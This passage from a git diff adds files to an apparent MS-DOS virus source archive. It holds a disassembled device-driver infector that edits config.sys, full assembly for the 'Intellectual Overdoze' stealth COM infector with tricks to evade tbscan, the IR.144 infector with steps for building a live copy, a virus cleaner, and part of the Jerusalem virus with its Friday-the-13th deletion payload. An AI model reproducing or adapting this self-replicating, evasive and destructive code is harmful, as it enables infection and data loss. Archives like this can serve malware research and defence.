fa 06 mov si,06fa +0b59:044b bf 58 05 mov di,0558 +0b59:044e f3 repz +0b59:044f a5 movs +0b59:0450 b9 00 00 mov cx,0000 +0b59:0453 ba 00 00 mov dx,0000 +0b59:0456 b8 00 42 mov ax,4200 +0b59:0459 cd 21 int 21 +0b59:045b 72 29 jb 0486 +0b59:045d c7 06 60 05 4a 4c mov word [0560],4c4a +0b59:0463 b9 14 00 mov cx,0014 +0b59:0466 ba 4e 05 mov dx,054e +0b59:0469 b4 40 mov ah,40 +0b59:046b cd 21 int 21 +0b59:046d 72 17 jb 0486 +0b59:046f ba 00 00 mov dx,0000 +0b59:0472 b9 fc 0a mov cx,0afc +0b59:0475 b4 40 mov ah,40 +0b59:0477 cd 21 int 21 +0b59:0479 72 0b jb 0486 +0b59:047b 8b 0e 62 05 mov cx,[0562] +0b59:047f ba f0 06 mov dx,06f0 +0b59:0482 b4 40 mov ah,40 +0b59:0484 cd 21 int 21 +0b59:0486 b4 3e mov ah,3e +0b59:0488 cd 21 int 21 + +0b59:048a 8e c5 mov es,bp +0b59:048c bf 80 00 mov di,0080 +0b59:048f be 66 05 mov si,0566 +0b59:0492 b9 40 00 mov cx,0040 +0b59:0495 f3 repz +0b59:0496 a5 movs +0b59:0497 8e dd mov ds,bp +0b59:0499 fa cli +0b59:049a b8 a0 0d mov ax,0da0 +0b59:049d 8e d0 mov ss,ax +0b59:049f bc 10 bf mov sp,bf10 +0b59:04a2 fb sti +0b59:04a3 ea 00 00 00 00 jmp 0000:0000 + +0b59:04a8 63 3a 5c 63 6f 6e 66 69 |c:\confi| +0b59:04b0 67 2e 73 79 73 00 45 56 |g.sys.EV| +0b59:04b8 49 43 45 00 43 3a 5c 76 |ICE.C:\v| +0b59:04c0 61 6e 73 69 2e 73 79 73 |ansi.sys| +0b59:04c8 00 64 65 76 69 63 65 3d |.device=| +0b59:04d0 76 61 6e 73 69 2e 73 79 |vansi.sy| +0b59:04d8 73 0d 0a 90 76 61 6e 73 |s...vans| +0b59:04e0 69 20 20 20 |i | +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +STRAT: + +0b59:04e4 2e 89 1e 1f 00 mov cs:[001f],bx +0b59:04e9 2e 8c 06 21 00 mov cs:[0021],es +0b59:04ee cb retf + +0b59:04ef 00 00 add [bx+si],al +0b59:04f1 00 00 add [bx+si],al + +0b59:04f3 53 push bx +0b59:04f4 06 push es +0b59:04f5 2e 8b 1e 1f 00 mov bx,cs:[001f] +0b59:04fa 2e 8e 06 21 00 mov es,cs:[0021] +0b59:04ff 26 c7 47 03 00 00 mov word es:[03+bx],0000 +0b59:0505 26 c7 47 0e 42 00 mov word es:[0e+bx],0042 +0b59:050b 26 8c 4f 10 mov es:[10+bx],cs +0b59:050f 07 pop es +0b59:0510 5b pop bx +0b59:0511 cb retf + +0b59:0512 ea c1 00 0a 0c jmp 0c0a:00c1 +0b59:0517 ea cc 00 0a 0c jmp 0c0a:00cc + +0b59:051c 50 push ax +0b59:051d 8c c8 mov ax,cs +0b59:051f 05 b1 00 add ax,00b1 +0b59:0522 2e a3 15 05 mov cs:[0515],ax +0b59:0526 2e a3 1a 05 mov cs:[051a],ax +0b59:052a b8 12 05 mov ax,0512 +0b59:052d 2e a3 06 00 mov cs:[0006],ax +0b59:0531 58 pop ax +0b59:0532 eb de jmp 0512 + +0b59:0534 50 push ax +0b59:0535 53 push bx +0b59:0536 1e push ds +0b59:0537 fa cli +0b59:0538 b8 00 00 mov ax,0000 +0b59:053b 8e d8 mov ds,ax +0b59:053d bb 84 00 mov bx,0084 +0b59:0540 8b 07 mov ax,[bx] +0b59:0542 2e a3 98 02 mov cs:[0298],ax +0b59:0546 8b 47 02 mov ax,[02+bx] +0b59:0549 2e a3 9a 02 mov cs:[029a],ax +0b59:054d b8 14 00 mov ax,0014 +0b59:0550 89 07 mov [bx],ax +0b59:0552 8c 4f 02 mov [02+bx],cs +0b59:0555 b8 17 05 mov ax,0517 +0b59:0558 2e a3 08 00 mov cs:[0008],ax +0b59:055c fb sti +0b59:055d 1f pop ds +0b59:055e 5b pop bx +0b59:055f 58 pop ax +0b59:0560 eb b5 jmp 0517 + +DEV_HDR: + +0b59:0562 ff ???? +0b59:0563 ff ???? +0b59:0564 ff ???? +0b59:0565 ff + 53 c0 +0b59:0568 1c 05 +0b59:056a 34 05 +0b59:056c 01 00 +0b59:056e 7c 2d +0b59:0570 4d +0b59:0571 5a diff --git a/MSDOS/Virus.MSDOS.Unknown.iod.asm b/MSDOS/Virus.MSDOS.Unknown.iod.asm new file mode 100644 index 00000000..1c4956c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.iod.asm @@ -0,0 +1,350 @@ +; ------------------------------------------------------------------------------ +; +; - Intellectual Overdoze - +; Created by Immortal Riot's destructive development team +; (c) 1994 The Unforgiven/Immortal Riot +; +;------------------------------------------------------------------------------- +; þ Memory Resident Stealth Infector of COM-programs þ +;------------------------------------------------------------------------------- + .model tiny + .code + org 100h + +start: + + jmp virus_start ; for first generation only! + db 'V' ; mark org file infected + +virus_start: + + mov sp,102h ; get delta offset without + call get_delta_offset ; getting detected by tbscan + + +get_delta_offset: + + call cheat_tbscan ; kick's tbscan's heuristics + mov si,word ptr ds:[100h] ; real bad! + mov sp,0fffeh + sub si,offset get_delta_offset + jmp short go_resident + +cheat_tbscan: + + mov ax,0305h ; keyb i/o + xor bx,bx + int 16h + ret + +go_resident: + + mov bp,si + +installtion_check: + + mov ax,6666h + int 21h + cmp bx,6666h ; 6666h returned in bx? + je already_resident ; = assume resident + + push cs + pop ds + +resize_memory_block: + + mov ah,4ah ; find top of memory + mov bx,0ffffh ; (65536) + int 21h + +resize_memory_block_for_virus: + + sub bx,(virus_end-virus_start+15)/16+1 ; resize enough para's + mov ah,4ah ; for virus + int 21h + +allocate_memory_block_for_virus: + + mov ah,48h ; allocate for virus + mov bx,(virus_end-virus_start+15)/16 + int 21h + jc not_enough_mem ; not enough memory! + + dec ax ; ax - 1 = mcb + push es + +mark_allocated_memory_block_to_dos: + + mov es,ax + mov byte ptr es:[0],'Z' + mov word ptr es:[1],8 ; dos = mcb owner + inc ax + +copy_virus_to_memory: + + cld ; clear direction for movsw + lea si,[bp+offset virus_start] ; vir start + mov es,ax + xor di,di + mov cx,(virus_end-virus_start+4)/2 ; vir len + rep movsw + +manually_hook_of_int21h: + + xor ax,ax + mov ds,ax + push ds + ; get/set int vector for int21 + lds ax,ds:[21h*4] + mov word ptr es:[oldint21h-virus_start],ax + mov word ptr es:[oldint21h-virus_start+2],ds + pop ds + mov word ptr ds:[21h*4],(newint21h-virus_start) + + mov bx,es ; cheat tbscan since + mov ds:[21h*4+2],bx ; mov ds:[21h*4+2],es = M flag + + push cs + pop ds + +exit: +not_enough_mem: +already_resident: + + push cs + pop es + +restore_first_bytes: + + mov di,100h + mov cx,4 + mov si,offset orgbuf + add si,bp ; fix correct offset (delta) + repne movsb + +jmp_org_program: + + mov ax,101h ; cheats tbscan's back to + dec ax ; entry point + jmp ax + + +newint21h: + + cmp ax,4b00h ; file executed? + je infect + + cmp ah,11h ; fcb findfirst call? + je fcb_stealth + + cmp ah,12h ; fcb findnext call? + je fcb_stealth + + cmp ax,6666h ; residency check + jne do_old21h ; not resident + mov bx,6666h ; return marker in bx + +do_old21h: + + jmp dword ptr cs:[(oldint21h-virus_start)] ; jmp ssss:oooo + ret + +fcb_stealth: + + pushf + push cs ; fake a int call with pushf + call do_old21h ; and cs, ip on the stack + cmp al,00 ; dir successfull? + jnz dir_error ; naw, skip stealth routine! + push ax + push bx + push es + mov ah,51h ; Get active PSP to es:bx + int 21h + mov es,bx + cmp bx,es:[16h] ; Dos calling it? + jnz not_dos ; Nope! + mov bx,dx + mov al,[bx] ; al = current drive + push ax + mov ah,2fh ; get dta area + int 21h + pop ax ; check extended fcb + inc al ; "cmp byte ptr [bx],0ffh" + jnz normal_fcb ; nope, regular fcb! + +ext_fcb: + add bx,7h ; skip junkie if ext fcb + +normal_fcb: + + mov ax,es:[bx+17h] ; get second value + and ax,1fh + xor al,01h + jnz no_stealth ; second-stealth value match + +; Here one should really check (i) if the file was a comfile, and (ii), +; the file-size ( >472 bytes) But oh well, maybe to come.. + + and byte ptr es:[bx+17h],0e0h ; substract virus len + sub es:[bx+1dh],(virus_end-virus_start) + sbb es:[bx+1fh],ax + +no_stealth: +not_dos: + + pop es + pop bx + pop ax + +dir_error: + iret + +infect: + + push ax + push bx + push cx + push dx + push di + push si + push ds + push es + +open_file: + + mov ax,3d02h ; open file in read/write + int 21h ; mode + jc error_open ; error on file open + + xchg ax,bx ; file handle in bx + + push ds + push cs + pop ds + +read_firstbytes: + + mov ah,3fh ; read first four bytes + mov dx,(orgbuf-virus_start) ; to orgbuf + mov cx,4 + int 21h + + +check_file_executed: + + cmp byte ptr cs:[(orgbuf-virus_start)],'M' ; check only first byte + je exe_file ; - fooling tbscan + + +check_previous_infection: + + cmp byte ptr cs:[(orgbuf-virus_start)+3],'V' ; already infected? + je already_infected + + jmp short get_file_time_date ; not infected + +error_open: +already_infected: +exe_file: + + + jmp exit_proc ; dont infect file + + +get_file_time_date: + + mov ax,5700h ; get time/date + int 21h + + mov word ptr cs:[(old_time-virus_start)],cx ; save time + mov word ptr cs:[(old_date-virus_start)],dx ; and date + +go_endoffile: + + mov ax,4202h ; go end of file + xor cx,cx + cwd + int 21h + +check_file_size: + + cmp ax,3072d ; check file-size + jb too_small + + cmp ax,64000d + ja too_big + +create_newjump: + + sub ax,3 ; 0e9h,XX,XX, + mov word ptr cs:[(newbuf+1-virus_start)],ax ; V => AX + +write_virus: + + mov ah,40h ; write virus to end of file + mov cx,(virus_end-virus_start) +; cwd ; (dx = 0 since go eof) + int 21h + +go_tof: + + mov ax,4200h + xor cx,cx +; cwd ; ( dx = 0 since go eof) + int 21h + + +write_newjump: + + mov ah,40h ; write new jmp to tof + mov cx,4 ; = 0E9H,XX,XX,V + mov dx,(newbuf-virus_start) ; offset to write from + int 21h + + +set_org_time_date: +too_small: +too_big: + + mov ax,5701h ; set back org + mov word ptr cx,cs:[(old_time-virus_start)] ; time + mov word ptr dx,cs:[(old_date-virus_start)] ; date + + +set_stealth_marker: + + and cl,0e0h ; give file + inc cl ; specific + int 21h ; second val + +close_file: + + mov ah,3eh ; close file + int 21h + +exit_proc: + + pop ds + pop es + pop ds + pop si + pop di + pop dx + pop cx + pop bx + pop ax + + jmp dword ptr cs:[(oldint21h-virus_start)] ; jmp ssss:oooo + +old_date dw 0 ; storage buffers +old_time dw 0 ; for file time/date +oldint21h dd ? ; and oldint21h + +orgbuf db 0cdh,20h,00,00 ; buffer to save first 4 bytes in +newbuf db 0E9h,00,00,'V' ; buffer to calculate a new entry + +copyrt db "[Overdoze] (c) 1994 The Unforgiven/Immortal Riot" + +virus_end: + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ir144.asm b/MSDOS/Virus.MSDOS.Unknown.ir144.asm new file mode 100644 index 00000000..0ad57549 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ir144.asm @@ -0,0 +1,123 @@ +; Virusname: IR.144 +; Origin : Sweden +; Author : Metal Militia/Immortal Riot +; +; Ok, this is not one of the very tiny viruses out there today, but to +; date this is the smallest one I've ever made and since I never really +; care about size when I write my creations I think thisone's pretty ok. +; There are others out there on about 100 bytes that does the same, but +; who gives a shit? If you don't like thisone, take a look at my +; "fixed-up" version [UNIQ], also included in this issue of Insane +; Reality. +; +; In order to get thisone working it needs a host, so create the +; following bytes of code and then do a "copy /b dummy.com+ir144.com +; ready.com" and woha! A very working copy. +; +; ----------------------- +; .model tiny ; DUMMY.ASM +; .code +; org 100h +; +; sov: +; +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; +; end sov +; ----------------------- +.model tiny ; IR144.ASM +.radix 16 +.code + org 100 +start: + call get_offset + +get_offset: + pop bp ; get the + sub bp,offset get_offset ; delta offset + + lea si,[buffa_bytes+bp] ; restore our + mov di,100 ; first four + movsw ; bytes + movsw + + lea dx,[end_virus+bp] ; set the + mov ah,1a ; DTA to eov + int 21 + + lea dx,[find_files+bp] ; matching "*.com" + mov ah,4e ; find first +find_next: + int 21 + jc reset_DTA + + lea dx,[end_virus+1e+bp] + mov ax,3d02 ; open it + int 21 + + jc get_more + + xchg bx,ax + + mov cx,4 ; first four bytes + mov ah,3f ; read em + lea dx,[buffa_bytes+bp] ; and put them in + int 21 ; our buffer + + cmp byte ptr [buffa_bytes+bp+3],'V' ; check if already + jz close_em ; infected + + mov ax,4202 ; goto EOF + sub cx,cx + cwd + int 21 + + sub ax,3 + mov word ptr [bp+jump_bytes+1],ax ; use our 'jmp' bytes + + mov ah,40 ; write our + mov cx,end_virus-start ; viral code + lea dx,[bp+start] ; to victim file + int 21 + + mov ax,4200 ; goto SOF + sub cx,cx + cwd + int 21 + + mov ah,40 ; write our + mov cx,4 ; first four + lea dx,[bp+jump_bytes] ; bytes over + int 21 ; the original + +close_em: + mov ah,3e ; close file + int 21 + +get_more: + mov ah,4f ; find next + jmp find_next + +reset_DTA: + mov dx,80 ; reset the DTA + mov ah,1a + int 21 + + mov di,100 ; and return + push di ; to the original + ret ; program + + +find_files db '*.com',0 ; victim files +jump_bytes db 0e9,0,0,'V' ; our 'jmp' bytes + +buffa_bytes: ; the original first four bytes will be put here + xchg ax,ax ; nop + xchg ax,ax ; nop + int 20 ; ret(urn) to prompt + +end_virus: +end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm b/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm new file mode 100644 index 00000000..6a68633f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm @@ -0,0 +1,295 @@ +; Binary Obsession Cleaner +; - By Ratman - + + +data_18e equ 9CDh ;* +data_19e equ 4F43h ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +irm_kill proc far + +start: + + mov ah,9 + mov dx,offset data_1 ; ('IR Multi-Partite Virus K') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +;====( Here is the program's self-check routine )==============================; + + cmp word ptr ds:data_18e,3E8h + jne loc_1 + +; jmp short loc_1 ; 'Crack it' + +; If you want it 'cracked', exchange the jne loc_1 to "jmp short loc_1" and +; voila!.. Program run like it wasn't modified.. All trivia really, and +; very usuful if one want a trojanized version of this program :). + + mov ah,9 + mov dx,offset data_6 ; ('Scanner fails Self-Check') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; DOS program terminate + +loc_1: + mov ax,201h + mov bx,offset data_15 + mov cx,1 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + cmp data_15,3E8h + jne loc_2 ; Jump if not equal + mov ah,9 + mov dx,offset data_2 ; ('Warning!: IR MultiPartit') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp ah,15h + jne loc_2 ; Jump if not equal + mov ax,201h + mov bx,offset data_15 + mov cx,2 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + mov ax,301h + mov bx,offset data_15 + mov cx,1 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + mov ah,9 + mov dx,offset data_4 ; ('Drive C: MBR is now Clea') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_2: + mov ah,9 + mov dx,offset data_5 ; ('Scanning the files in th') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,2Fh + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ah,4Eh + mov cx,7 + mov dx,586h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_4 ; Jump if carry Set +loc_3: + call sub_1 + mov ah,4Fh + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_3 ; Jump if carry=0 +loc_4: + jmp short $+3 ; delay for I/O + nop + int 20h ; DOS program terminate + +irm_kill endp + +sub_1 proc near + push ax + push bx + push cx + push dx + push di + push si + push es + push es + pop ds + push cs + pop es + mov si,bx + add si,1Eh + mov di,58Ch + mov cx,0Fh + push cx + push di + rep movsb + pop di + pop cx + xor al,al + cld + repne scasb + mov al,20h + rep stosb + mov byte ptr es:[di],24h ; '$' + pop es + push cs + pop ds + mov ah,9 + mov dx,58Ch + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,3D02h + mov dx,bx + add dx,1Eh + push es + pop ds + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + xor cx,cx ; Zero register + mov dx,ax + sub dx,1B9h ; EOF-441 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,3Fh + mov cx,1B9h ; 441 bytes + mov dx,offset data_15 + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp data_15,3E8h + jne loc_5 ; Jump if not equal + mov ah,9 + mov dx,offset data_9 ; ('is infected by IR MultiP') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp ah,15h + je loc_7 ; Jump if equal + mov ah,9 + mov dx,offset data_11 ; (' - No') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp short loc_6 + db 90h +loc_5: + mov ah,9 + mov dx,offset data_8 ; ('is clean...') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_6: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov data_15,0 + pop si + pop si + pop dx + pop cx + pop bx + pop ax + retn +loc_7: + mov ah,9 + mov dx,offset data_10 ; (' - Yes') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + xor cx,cx ; Zero register + xor dx,dx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,3 + mov dx,offset data_17 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + xor cx,cx ; Zero register + mov dx,ax + sub dx,1B9h + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,0 + mov dx,offset data_15 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_6 +sub_1 endp + +data_1 db 'IR Multi-Partite Virus Killer by' + db ' -+ RatMan +-', 0Ah, 0Dh +copyright db '(C) 1994 RatMan - This program i' + db 's free of charge for all use' + db 'rs.', 0Ah, 0Dh, 'DISCLAIMER: Thi' + db 's software is provided "AS IS" ' + db 'without warranty of any kind,', 0Ah + db 0Dh, 'either expressed or implied' + db ', including but not limmited to ' + db 'the fitness for', 0Ah, 0Dh, 'any' + db ' particular purpose. The entire ' + db 'risk as to its quality or perfor' + db 'mance', 0Ah, 0Dh, 'is assumed by' + db ' the user.', 0Ah, 0Dh, 0Ah, 0Dh, '$' +data_2 db 'Warning!: IR MultiPartite Virus ' + db 'found in MBR of Drive C: - Clean' + db ' (Y/N)', 0Ah, 0Dh, ' (I' + db 'f the System was booted from Dri' + db 've C: you should reboot', 0Ah, 0Dh + db ' from a clean floppy b' + db 'efore trying to clean your syste' + db 'm.....)', 7, 0Ah, 0Dh, 0Ah, 0Dh, '$' +data_4 db 'Drive C: MBR is now Clean......', 0Ah + db 0Dh, 0Ah, 0Dh, '$' +data_5 db 'Scanning the files in the Curren' + db 't Directory.....', 0Ah, 0Dh, 0Ah + db 0Dh, '$' +data_6 db 'Scanner fails Self-Check.....', 7 + db 0Ah, 0Dh, '$' +data_8 db 'is clean...', 0Dh, 0Ah, '$' +data_9 db 'is infected by IR MultiPartite V' + db 'irus - Clean ? (Y/N)', 7, '$' +data_10 db ' - Yes', 0Ah, 0Dh, '$' +data_11 db ' - No', 0Ah, 0Dh, '$' + db 0, 0 +data_12 db 2Ah + db 2Eh, 43h, 4Fh, 4Dh, 00h +data_13 db 1 + db 63 dup (1) +data_15 dw 0 + db 0 +data_17 db 0 + db 1021 dup (0) + +seg_a ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.israeli.asm b/MSDOS/Virus.MSDOS.Unknown.israeli.asm new file mode 100644 index 00000000..46f77f58 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.israeli.asm @@ -0,0 +1,753 @@ +;The "Jerusalem" virus. +;Also Called - Israeli, PLO, Friday the 13th - Version A + + + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN 